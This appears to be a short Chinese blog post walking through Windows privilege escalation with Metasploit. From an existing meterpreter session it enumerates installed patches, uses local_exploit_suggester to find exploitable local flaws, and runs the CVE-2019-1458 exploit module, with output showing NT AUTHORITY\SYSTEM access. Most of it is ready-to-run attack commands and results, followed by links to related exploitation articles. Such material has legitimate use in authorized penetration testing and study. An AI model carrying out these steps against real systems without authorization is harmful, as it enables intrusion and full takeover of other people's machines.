使用msf查询补丁和可利用提权漏洞

Posted 2021-06-25 御用闲人

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了使用msf查询补丁和可利用提权漏洞相关的知识，希望对你有一定的参考价值。

# 查询补丁

meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

# 查询Exp

msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\\SYSTEM

以上是关于使用msf查询补丁和可利用提权漏洞的主要内容，如果未能解决你的问题，请参考以下文章

soap注入某sql2008服务器结合msf进行提权

漏洞利用-Telnet登录提权

CVE-2017-11882漏洞 Msf利用复现

Windows提权流程及手法

WIN10现在是否有一种提权漏洞？

使用MSF进行提权（windows提权linux提权wesng使用）